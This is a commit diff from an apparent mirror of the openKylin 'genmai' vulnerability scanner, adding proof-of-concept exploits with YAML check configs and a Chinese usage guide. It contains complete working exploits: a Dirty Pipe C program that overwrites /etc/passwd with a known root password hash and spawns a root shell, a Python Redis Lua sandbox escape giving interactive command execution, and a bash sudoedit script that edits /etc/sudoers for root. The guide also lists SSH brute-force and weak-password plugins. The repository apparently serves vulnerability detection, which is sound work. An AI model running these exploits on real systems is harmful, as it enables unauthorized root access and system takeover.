mirror of https://gitee.com/openkylin/genmai.git
Merge branch 'master' of gitee.com:openkylin/genmai into master
Signed-off-by: shawnlin529 <linqx529@buaa.edu.cn>
This commit is contained in:
commit
1cb3935616
Binary file not shown.
|
@ -0,0 +1,179 @@
|
|||
/* SPDX-License-Identifier: GPL-2.0 */
|
||||
/*
|
||||
* Copyright 2022 CM4all GmbH / IONOS SE
|
||||
*
|
||||
* author: Max Kellermann <max.kellermann@ionos.com>
|
||||
*
|
||||
* Proof-of-concept exploit for the Dirty Pipe
|
||||
* vulnerability (CVE-2022-0847) caused by an uninitialized
|
||||
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
|
||||
* file contents in the page cache, even if the file is not permitted
|
||||
* to be written, immutable or on a read-only mount.
|
||||
*
|
||||
* This exploit requires Linux 5.8 or later; the code path was made
|
||||
* reachable by commit f6dd975583bd ("pipe: merge
|
||||
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
|
||||
* there before, it just provided an easy way to exploit it.
|
||||
*
|
||||
* There are two major limitations of this exploit: the offset cannot
|
||||
* be on a page boundary (it needs to write one byte before the offset
|
||||
* to add a reference to this page to the pipe), and the write cannot
|
||||
* cross a page boundary.
|
||||
*
|
||||
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
|
||||
*
|
||||
* Further explanation: https://dirtypipe.cm4all.com/
|
||||
*/
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/user.h>
|
||||
|
||||
#ifndef PAGE_SIZE
|
||||
#define PAGE_SIZE 4096
|
||||
#endif
|
||||
|
||||
/**
|
||||
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
|
||||
* PIPE_BUF_FLAG_CAN_MERGE flag set.
|
||||
*/
|
||||
static void prepare_pipe(int p[2])
|
||||
{
|
||||
if (pipe(p)) abort();
|
||||
|
||||
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
|
||||
static char buffer[4096];
|
||||
|
||||
/* fill the pipe completely; each pipe_buffer will now have
|
||||
the PIPE_BUF_FLAG_CAN_MERGE flag */
|
||||
for (unsigned r = pipe_size; r > 0;) {
|
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
|
||||
write(p[1], buffer, n);
|
||||
r -= n;
|
||||
}
|
||||
|
||||
/* drain the pipe, freeing all pipe_buffer instances (but
|
||||
leaving the flags initialized) */
|
||||
for (unsigned r = pipe_size; r > 0;) {
|
||||
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
|
||||
read(p[0], buffer, n);
|
||||
r -= n;
|
||||
}
|
||||
|
||||
/* the pipe is now empty, and if somebody adds a new
|
||||
pipe_buffer without initializing its "flags", the buffer
|
||||
will be mergeable */
|
||||
}
|
||||
|
||||
int main() {
|
||||
const char *const path = "/etc/passwd";
|
||||
|
||||
printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
|
||||
FILE *f1 = fopen("/etc/passwd", "r");
|
||||
FILE *f2 = fopen("/tmp/passwd.bak", "w");
|
||||
|
||||
if (f1 == NULL) {
|
||||
printf("Failed to open /etc/passwd\n");
|
||||
exit(EXIT_FAILURE);
|
||||
} else if (f2 == NULL) {
|
||||
printf("Failed to open /tmp/passwd.bak\n");
|
||||
fclose(f1);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
char c;
|
||||
while ((c = fgetc(f1)) != EOF)
|
||||
fputc(c, f2);
|
||||
|
||||
fclose(f1);
|
||||
fclose(f2);
|
||||
|
||||
loff_t offset = 4; // after the "root"
|
||||
const char *const data = ":$1$antx-soc$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt antx-soc antx-soc
|
||||
printf("Setting root password to \"antx-soc\"...\n");
|
||||
const size_t data_size = strlen(data);
|
||||
|
||||
if (offset % PAGE_SIZE == 0) {
|
||||
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
|
||||
const loff_t end_offset = offset + (loff_t)data_size;
|
||||
if (end_offset > next_page) {
|
||||
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
/* open the input file and validate the specified offset */
|
||||
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
|
||||
if (fd < 0) {
|
||||
perror("open failed");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
struct stat st;
|
||||
if (fstat(fd, &st)) {
|
||||
perror("stat failed");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
if (offset > st.st_size) {
|
||||
fprintf(stderr, "Offset is not inside the file\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
if (end_offset > st.st_size) {
|
||||
fprintf(stderr, "Sorry, cannot enlarge the file\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
/* create the pipe with all flags initialized with
|
||||
PIPE_BUF_FLAG_CAN_MERGE */
|
||||
int p[2];
|
||||
prepare_pipe(p);
|
||||
|
||||
/* splice one byte from before the specified offset into the
|
||||
pipe; this will add a reference to the page cache, but
|
||||
since copy_page_to_iter_pipe() does not initialize the
|
||||
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
|
||||
--offset;
|
||||
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
|
||||
if (nbytes < 0) {
|
||||
perror("splice failed");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
if (nbytes == 0) {
|
||||
fprintf(stderr, "short splice\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
/* the following write will not create a new pipe_buffer, but
|
||||
will instead write into the page cache, because of the
|
||||
PIPE_BUF_FLAG_CAN_MERGE flag */
|
||||
nbytes = write(p[1], data, data_size);
|
||||
if (nbytes < 0) {
|
||||
perror("write failed");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
if ((size_t)nbytes < data_size) {
|
||||
fprintf(stderr, "short write\n");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
char *argv[] = {"/bin/sh", "-c", "(echo antx-soc; cat) | su - -c \""
|
||||
"echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
|
||||
"cp /tmp/passwd.bak /etc/passwd;"
|
||||
"echo \\\"Done! Popping shell... (run commands now)\\\";"
|
||||
"/bin/sh;"
|
||||
"\" root"};
|
||||
execv("/bin/sh", argv);
|
||||
|
||||
printf("system() function call seems to have failed :(\n");
|
||||
return EXIT_SUCCESS;
|
||||
}
|
|
@ -0,0 +1,38 @@
|
|||
FormatVer: 20230308
|
||||
Id: CVE-2022-0847
|
||||
Belong: kernel
|
||||
PocHazardLevel: high
|
||||
Source: https://github.com/antx-code/CVE-2022-0847
|
||||
SiteInfo:
|
||||
Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
|
||||
Severity: high
|
||||
Description:
|
||||
DirtyPipe是自 内核版本5.8 以来 Linux 内核中的一个漏洞,允许覆盖任意只读文件中的数据。这会导致特权提升,因为非特权进程可以将代码注入根进程。
|
||||
ScopeOfInfluence:
|
||||
Linux kernel < 5.17-rc6.
|
||||
References:
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2022-0847
|
||||
- https://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html
|
||||
SiteClassification:
|
||||
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
CvssScore: 7.8
|
||||
CveId: CVE-2022-0847
|
||||
CweId: CWE-665, CWE-281
|
||||
CnvdId: None
|
||||
KveId: None
|
||||
Tags:
|
||||
- 权限提升
|
||||
SiteRequests:
|
||||
Implement:
|
||||
ImArray:
|
||||
- inter:
|
||||
InterArgs :
|
||||
Exec : CVE-2022-0847
|
||||
Args :
|
||||
ExpireTime: 30
|
||||
Inter:
|
||||
- ">.:>>"
|
||||
- "<<:id\n"
|
||||
- ">.:\n"
|
||||
- ">?:uid=0(root)"
|
||||
Condition: None
|
|
@ -5,3 +5,4 @@ ExplorerItems:
|
|||
- ConfigFile: CVE-2022-2588/CVE-2022-2588.yaml
|
||||
- ConfigFile: CVE-2022-2639/CVE-2022-2639.yaml
|
||||
- ConfigFile: CVE-2022-1015/CVE-2022-1015.yaml
|
||||
- ConfigFile: CVE-2022-0847/CVE-2022-0847.yaml
|
||||
|
|
|
@ -4,7 +4,7 @@ Belong: system
|
|||
PocHazardLevel: low
|
||||
Source: https://github.com/worawit/CVE-2021-3156
|
||||
SiteInfo:
|
||||
Name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
|
||||
Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
|
||||
Severity: high
|
||||
Description:
|
||||
Sudo before 1.9.5p2 存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
import redis
|
||||
import sys
|
||||
|
||||
def echoMessage():
|
||||
version = """
|
||||
[#] Create By ::
|
||||
_ _ ___ __ ____
|
||||
/ \ _ __ __ _ ___| | / _ \ / _| | _ \ ___ _ __ ___ ___ _ __
|
||||
/ _ \ | '_ \ / _` |/ _ \ | | | | | |_ | | | |/ _ \ '_ ` _ \ / _ \| '_ \
|
||||
/ ___ \| | | | (_| | __/ | | |_| | _| | |_| | __/ | | | | | (_) | | | |
|
||||
/_/ \_\_| |_|\__, |\___|_| \___/|_| |____/ \___|_| |_| |_|\___/|_| |_|
|
||||
|___/ By https://aodsec.com
|
||||
"""
|
||||
print(version)
|
||||
|
||||
def shell(ip,port,cmd):
|
||||
lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res'
|
||||
r = redis.Redis(host = ip,port = port)
|
||||
script = r.eval(lua,0)
|
||||
print(script)
|
||||
|
||||
if __name__ == '__main__':
|
||||
echoMessage()
|
||||
ip = "127.0.0.1"
|
||||
port = "6379"
|
||||
while True:
|
||||
cmd = input("input exec cmd:(q->exit)\n>>")
|
||||
if cmd == "q" or cmd == "exit":
|
||||
sys.exit()
|
||||
shell(ip,port,cmd)
|
|
@ -0,0 +1,53 @@
|
|||
FormatVer: 20230306
|
||||
Id: CVE-2022-0543
|
||||
Belong: system
|
||||
PocHazardLevel: low
|
||||
Source: https://github.com/aodsec/CVE-2022-0543
|
||||
SiteInfo:
|
||||
Name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。
|
||||
Severity: critical
|
||||
Description:
|
||||
Debian 以及 Ubuntu 发行版的源在打包 Redis 时,不慎在 Lua 沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库 liblua 里的函数,进而逃逸沙箱执行任意命令。我们借助 Lua 沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在 Lua 中执行这个导出函数,即可获得io库,再使用其执行命令。
|
||||
ScopeOfInfluence:
|
||||
2.2 <= redis < 5.0.13
|
||||
2.2 <= redis < 6.0.15
|
||||
2.2 <= redis < 6.2.5
|
||||
References:
|
||||
- http://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0543
|
||||
SiteClassification:
|
||||
CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
CvssScore: 10.0
|
||||
CveId: CVE-2022-0543
|
||||
CweId: None
|
||||
CnvdId: None
|
||||
KveId: None
|
||||
Tags:
|
||||
- cve2022
|
||||
- redis
|
||||
- RCE
|
||||
SiteRequests:
|
||||
Implement:
|
||||
ImArray:
|
||||
- Inter : python3
|
||||
InterArgs :
|
||||
Exec : CVE-2022-0543.py
|
||||
Args :
|
||||
ExpireTime: #second
|
||||
|
||||
# < input
|
||||
# > output
|
||||
# . wait
|
||||
# ? condition
|
||||
# : content
|
||||
#
|
||||
#组合起来
|
||||
# >. 等待直到输出
|
||||
# << 输入字符
|
||||
# >?判断条件
|
||||
Inter:
|
||||
- ">.:>>" #ture
|
||||
- "<<:whoami\n"
|
||||
- ">.:\n" #等待输出'\n'
|
||||
- ">?:root"
|
||||
Condition: None
|
|
@ -0,0 +1,41 @@
|
|||
#!/usr/bin/env bash
|
||||
#
|
||||
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
|
||||
#
|
||||
# Exploit Author: n3m1.sys
|
||||
# CVE: CVE-2023-22809
|
||||
# Date: 2023/01/21
|
||||
# Vendor Homepage: https://www.sudo.ws/
|
||||
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
|
||||
# Version: 1.8.0 to 1.9.12p1
|
||||
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
|
||||
#
|
||||
# Running this exploit on a vulnerable system allows a localiattacker to gain
|
||||
# a root shell on the machine.
|
||||
#
|
||||
# The exploit checks if the current user has privileges to run sudoedit or
|
||||
# sudo -e on a file as root. If so it will open the sudoers file for the
|
||||
# attacker to add a line to gain privileges on all the files and get a root
|
||||
# shell.
|
||||
|
||||
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
|
||||
then
|
||||
echo "> Currently installed sudo version is not vulnerable"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
|
||||
|
||||
if [ -z "$EXPLOITABLE" ]; then
|
||||
echo "> It doesn't seem that this user can run sudoedit as root"
|
||||
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
|
||||
else
|
||||
echo "> BINGO! User exploitable"
|
||||
fi
|
||||
|
||||
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
|
||||
echo "$USER ALL=(ALL:ALL) ALL"
|
||||
read -n 1 -s -r -p "Press any key to continue..."
|
||||
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
|
||||
sudo su root
|
||||
exit 0
|
|
@ -0,0 +1,47 @@
|
|||
FormatVer: 20230308
|
||||
Id: CVE-2023-22809
|
||||
Belong: system
|
||||
PocHazardLevel: low
|
||||
Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
|
||||
SiteInfo:
|
||||
Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
|
||||
Severity: high
|
||||
Description:
|
||||
Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
|
||||
ScopeOfInfluence:
|
||||
sudo@[1.8.0, 1.9.12p2)
|
||||
References:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-22809
|
||||
SiteClassification:
|
||||
CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
CvssScore: 7.8
|
||||
CveId: CVE-2023-22809
|
||||
CweId: CWE-269
|
||||
CnvdId: None
|
||||
KveId: None
|
||||
Tags:
|
||||
- 特权管理不当
|
||||
SiteRequests:
|
||||
Implement:
|
||||
ImArray:
|
||||
- Inter : bash
|
||||
InterArgs :
|
||||
Exec : CVE-2023-22809.sh
|
||||
Args :
|
||||
ExpireTime: #second
|
||||
|
||||
# < input
|
||||
# > output
|
||||
# . wait
|
||||
# ? condition
|
||||
# : content
|
||||
#
|
||||
#组合起来
|
||||
# >. 等待直到输出
|
||||
# << 输入字符
|
||||
# >?判断条件
|
||||
Inter:
|
||||
- "<<:whoami\n" #ture
|
||||
- ">.:\n"
|
||||
- ">?:root"
|
||||
Condition: None
|
|
@ -9,6 +9,8 @@ ExplorerItems:
|
|||
- ConfigFile: CVE-2022-1292/CVE-2022-1292.yaml
|
||||
- ConfigFile: CVE-2021-44142/CVE-2021-44142.yaml
|
||||
- ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml
|
||||
- ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
|
||||
- ConfigFile: CVE-2021-4034/CVE-2021-4034.yaml
|
||||
- ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
|
||||
- ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
|
||||
- ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
|
||||
- ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
|
||||
- ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml
|
|
@ -0,0 +1,32 @@
|
|||
genmai工具使用文档
|
||||
|
||||
|
||||
一. 环境搭建:
|
||||
- golang环境大于等于go1.17.2;
|
||||
- python3环境大于等于3.8;
|
||||
- 进入src目录下终端导入golang需要引入的库,这里使用 ”go mod tidy” 进行导入库;
|
||||
- 进入src目录,使用pip3进行导入需要的python库,这里使用 “pip3 install -r requirements.txt”,若加载过慢可使用清华源加载(pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple );
|
||||
|
||||
二. Kernel模块
|
||||
- kernel模块为genmai中内核漏洞检测模块。在环境搭建好后使用 ”go run main.go -kernel=all”就可以使用poc/exp检测内核模块是否存在漏洞。因为内核漏洞会引起系统崩溃,所以这里我们默认poc/exp为低破坏性的,具有破坏性通过匹配内核版本,需人工手动执行exp。
|
||||
- 我们也可以通过配置KernelPocs.yaml或KernelPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。
|
||||
|
||||
三. System模块
|
||||
- system模块为genami中系统漏洞检测模块,其检测通过去调度SystemPocs目录下的poc检测包括sudo提权、polkit提权、openssl等相关漏洞。
|
||||
- 这里使用 ”go run main.go -system=all”开始系统检测。
|
||||
- 我们也可以通过配置SystemPocs.yaml或SystemPocs.json文件来选择要执行哪些poc,当然我们这默认选择是yaml文件。
|
||||
|
||||
四. Baseline模块
|
||||
- BaseLine模块介绍及使用:
|
||||
- baseline模块为genmai工具的基线检测模块,基线检查功能通过配置不同的基线检查策略,可以帮助您快速对服务器进行批量扫描,发现包括系统、账号权限、数据库、弱口令 、等级保护合规配置等存在的风险点。我们使用 ”go run main.go -baseline=all”开始进行基线检测。
|
||||
- 可以看出部分基线检测是需要高权限才能检测,这时我们可以配置data/BaseLine下的BaseLine.yaml文件中的RootPasswd,将root密码对应填入。接着 ”systemctl start ssh” 开启ssh。再次执行基线检测命令。
|
||||
|
||||
五. 插件模块
|
||||
1. FastScan(系统漏洞版本匹配,快速扫描)
|
||||
> FastScan是通过匹配版本号的方式,对系统进行快速扫描。这里我们使用了内部数据库,暂时还未准备将数据库公开。所以在扫描前需要输入数据库密码。配置完成后,我们使用 ”go run main.go -FastScan”就可以开始对系统进行快速扫描。
|
||||
2. Fofa(fofa获取资产信息)
|
||||
3. Nmap(Nmap检测端口开放情况)
|
||||
4. SSHExplosion(ssh快速爆破检测弱密码情况)
|
||||
5. WeakPwdGeneration(弱密码生成器)
|
||||
|
||||
六.POC/EXP/基线策略添加
|
Loading…
Reference in New Issue